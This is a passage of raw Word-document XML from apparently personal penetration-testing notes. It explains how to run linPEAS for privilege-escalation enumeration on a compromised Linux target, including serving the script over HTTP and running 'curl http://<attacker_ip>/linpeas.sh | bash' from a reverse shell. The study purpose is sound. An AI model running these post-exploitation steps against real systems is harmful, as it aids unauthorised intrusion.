      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./linpeas &gt; linpeas.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then upload it to your local kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then either open it in your sublime text on kali, or drag and drop it (by going to file manager on kali and dropping it into windows host) and open it from sublime text in windows host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, read it using ANSI package in sublime text:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the bottom right of Sublime text, you should see "plaintext"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3757613" cy="2095592"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="255" name="image277.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image277.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId401"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3757613" cy="2095592"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on that, and then select "ANSI" on the top</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3757613" cy="1924952"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="177" name="image167.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image167.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId402"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3757613" cy="1924952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you should have all the colors!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001500">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001501">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001502">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001503">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001504">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001505">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. First download linPEAS on local (attacking machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001506">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001507">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloads to a file name linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001508">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install peass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001509">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you have all the dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Start a Python HTTP Server to serve the linpeas.sh script so the target machine (via the reverse shell) can download it. MAKE SURE TO RUN THIS COMMAND IN THE SAME DIRECTORY AS WHERE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IS LOCATED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. From the target machine, on the reverse shell, curl your attacking machine to get the file and the run it immediately (that's why we are piping into bash)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000150F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://&lt;attacker_ip&gt;/linpeas.sh | bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001510">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001511">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. If you </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DON'T WANT it to run immediately</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can save the linpeas.sh file into another file inside of the reverse shell so that we can run it later</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001512">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -O linpeas.sh http://&lt;attacker_ip&gt;/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001514">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure it's executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001515">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001516">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod a+x ./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"a" means all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"x" means execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001519">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone can execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ddfof8uh6gxr" w:id="178"/>
      <w:bookmarkEnd w:id="178"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting important information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000151F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001520">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (27.2.2. A Link to the Past)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001521">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001522">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operative System:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001523">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="366" name="image356.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image356.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId403"/>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1524">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "4.4.0-21-generic" is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001525">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
